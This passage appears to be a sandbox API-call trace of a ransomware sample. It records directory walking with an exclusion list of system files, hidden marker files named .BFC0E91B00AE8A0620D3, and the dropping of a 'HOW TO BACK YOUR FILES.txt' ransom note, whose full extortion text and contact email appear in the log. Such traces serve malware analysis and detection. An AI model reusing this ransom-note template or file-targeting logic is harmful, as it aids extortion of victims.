ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07d8c0f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07d8c0f, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="Tiger4444.exe") returned -1 [0059.632] lstrcmpiW (lpString1="security", lpString2=".") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="..") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="windows") returned -1 [0059.632] lstrcmpiW (lpString1="security", lpString2="bootmgr") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="pagefile.sys") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="boot") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="ids.txt") returned 1 [0059.632] lstrcmpiW (lpString1="security", lpString2="NTUSER.DAT") returned 1 [0059.632] lstrcpyW (in: lpString1=0x30aeb12, lpString2="security" | out: lpString1="security") returned="security" [0059.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0059.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc71e18 [0059.632] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc664e8 [0059.632] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2="Tiger4444.exe") returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2=".") returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2="..") returned 1 [0059.632] lstrcmpiW (lpString1="tmp", lpString2="windows") returned -1 [0059.633] lstrcmpiW (lpString1="tmp", lpString2="bootmgr") returned 1 [0059.633] lstrcmpiW (lpString1="tmp", lpString2="pagefile.sys") returned 1 [0059.633] lstrcmpiW (lpString1="tmp", lpString2="boot") returned 1 [0059.633] lstrcmpiW (lpString1="tmp", lpString2="ids.txt") returned 1 [0059.633] lstrcmpiW (lpString1="tmp", lpString2="NTUSER.DAT") returned 1 [0059.633] lstrcpyW (in: lpString1=0x30aeb12, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0059.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0059.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x72) returned 0xc83610 [0059.633] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66548 [0059.633] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0059.633] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0059.633] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.633] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.633] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.634] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.634] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.634] CloseHandle (hObject=0x2b8) returned 1 [0059.634] CloseHandle (hObject=0x2c4) returned 1 [0059.634] GetCurrentThreadId () returned 0xfa8 [0059.634] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0059.634] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" [0059.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83610 | out: hHeap=0xc50000) returned 1 [0059.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0059.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp" [0059.634] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\" [0059.634] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3" [0059.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\tmp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) Thread: id = 13 os_tid = 0xf9c [0038.099] RtlInterlockedPopEntrySList (in: ListHead=0xc66468 | out: ListHead=0xc66468) returned 0xc66548 [0038.099] lstrcpynW (in: lpString1=0x2fae920, lpString2="Z:\\Recovery", iMaxLength=2048 | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0038.099] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66500 | out: hHeap=0xc50000) returned 1 [0038.099] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0038.099] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0038.099] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0038.099] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0038.099] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0038.099] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery" | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0038.099] lstrcatW (in: lpString1="Z:\\Recovery", lpString2="\\" | out: lpString1="Z:\\Recovery\\") returned="Z:\\Recovery\\" [0038.099] lstrcatW (in: lpString1="Z:\\Recovery\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" [0038.100] CreateFileW (lpFileName="Z:\\Recovery\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x290 [0038.100] ReadFile (in: hFile=0x290, lpBuffer=0x2fac508, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x2fac504, lpOverlapped=0x0 | out: lpBuffer=0x2fac508*, lpNumberOfBytesRead=0x2fac504*=0x3d4, lpOverlapped=0x0) returned 1 [0038.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc752d8 [0038.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d350 [0038.100] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0038.100] lstrlenA (lpString="{{ID}}") returned 6 [0038.100] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0038.100] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x74c) returned 0xc84e70 [0038.100] CloseHandle (hObject=0x290) returned 1 [0038.100] GetLastError () returned 0x0 [0038.100] lstrlenW (lpString="Z:\\Recovery") returned 11 [0038.100] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0038.100] FindFirstFileW (in: lpFileName="Z:\\Recovery\\*", lpFindFileData=0x2faddd0 | out: lpFindFileData=0x2faddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0038.101] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.101] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.101] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0038.101] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0038.101] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x2faddd0 | out: lpFindFileData=0x2faddd0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x21f97274, ftLastAccessTime.dwHighDateTime=0x1d32795, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.101] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.101] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.101] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0038.101] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0038.101] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0038.101] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x2faddd0 | out: lpFindFileData=0x2faddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ba35036, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ba35036, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ba35036, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="")) returned 1 [0038.101] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.101] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0038.101] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x2faddd0 | out: lpFindFileData=0x2faddd0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="Tiger4444.exe") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2=".") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="..") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="windows") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="bootmgr") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="pagefile.sys") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="boot") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="ids.txt") returned 1 [0038.101] lstrcmpiW (lpString1="WindowsRE", lpString2="NTUSER.DAT") returned 1 [0038.101] lstrcpyW (in: lpString1=0x2fae938, lpString2="WindowsRE" | out: lpString1="WindowsRE") returned="WindowsRE" [0038.101] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE", dwFileAttributes=0x2012) returned 1 [0038.102] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery\\WindowsRE" | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0038.102] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="Z:\\Recovery\\WindowsRE\\") returned="Z:\\Recovery\\WindowsRE\\" [0038.102] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" [0038.102] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\windowsre\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x294 [0038.103] WriteFile (in: hFile=0x294, lpBuffer=0x2fad928*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x2fac8e0, lpOverlapped=0x0 | out: lpBuffer=0x2fad928*, lpNumberOfBytesWritten=0x2fac8e0*=0x3d4, lpOverlapped=0x0) returned 1 [0038.105] FlushFileBuffers (hFile=0x294) returned 1 [0038.108] SetFileAttributesW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0038.108] CloseHandle (hObject=0x294) returned 1 [0038.108] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0038.108] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc67598 [0038.108] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66448 | out: ListHead=0xc66808, ListEntry=0xc66448) returned 0x0 [0038.108] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x2faddd0 | out: lpFindFileData=0x2faddd0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 0 [0038.108] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0038.108] lstrcpyW (in: lpString1=0x2fae938, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0038.108] CreateFileW (lpFileName="Z:\\Recovery\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\recovery\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0038.109] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x294 [0038.109] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc20000 [0038.110] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0038.110] CloseHandle (hObject=0x294) returned 1 [0038.110] CloseHandle (hObject=0x290) returned 1 [0038.110] GetCurrentThreadId () returned 0xf9c [0038.111] RtlInterlockedPopEntrySList (in: ListHead=0xc66468 | out: ListHead=0xc66468) returned 0x0 [0038.111] GetCurrentThreadId () returned 0xf9c [0038.111] WaitForMultipleObjects (nCount=0x0, lpHandles=0x2fae020*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0038.111] RtlInterlockedPopEntrySList (in: ListHead=0xc66468 | out: ListHead=0xc66468) returned 0x0 [0038.111] RtlInterlockedFlushSList (in: ListHead=0xc66468 | out: ListHead=0xc66468) returned 0x0 [0038.111] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66460 | out: hHeap=0xc50000) returned 1 [0038.111] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6f470 | out: hHeap=0xc50000) returned 1 [0038.111] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84e70 | out: hHeap=0xc50000) returned 1 [0038.111] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0038.111] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d350 | out: hHeap=0xc50000) returned 1 Thread: id = 14 os_tid = 0xf7c [0038.435] RtlInterlockedPopEntrySList (in: ListHead=0xc66448 | out: ListHead=0xc66448) returned 0xc664c8 [0038.435] lstrcpynW (in: lpString1=0x2faec68, lpString2="Z:\\Recovery\\WindowsRE", iMaxLength=2048 | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0038.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc678e0 | out: hHeap=0xc50000) returned 1 [0038.435] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664c0 | out: hHeap=0xc50000) returned 1 [0038.435] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery\\WindowsRE" | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0038.435] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="Z:\\Recovery\\WindowsRE\\") returned="Z:\\Recovery\\WindowsRE\\" [0038.435] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" [0038.435] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\windowsre\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0038.435] lstrcatW (in: lpString1="", lpString2="Z:\\Recovery\\WindowsRE" | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0038.435] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE", lpString2="\\" | out: lpString1="Z:\\Recovery\\WindowsRE\\") returned="Z:\\Recovery\\WindowsRE\\" [0038.435] lstrcatW (in: lpString1="Z:\\Recovery\\WindowsRE\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3") returned="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" [0038.435] CreateFileW (lpFileName="Z:\\Recovery\\WindowsRE\\.BFC0E91B00AE8A0620D3" (normalized: "z:\\recovery\\windowsre\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a4 [0038.435] ReadFile (in: hFile=0x2a4, lpBuffer=0x2fac850, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x2fac84c, lpOverlapped=0x0 | out: lpBuffer=0x2fac850*, lpNumberOfBytesRead=0x2fac84c*=0x3d4, lpOverlapped=0x0) returned 1 [0038.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc752d8 [0038.435] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0038.435] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0038.435] lstrlenA (lpString="{{ID}}") returned 6 [0038.435] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt 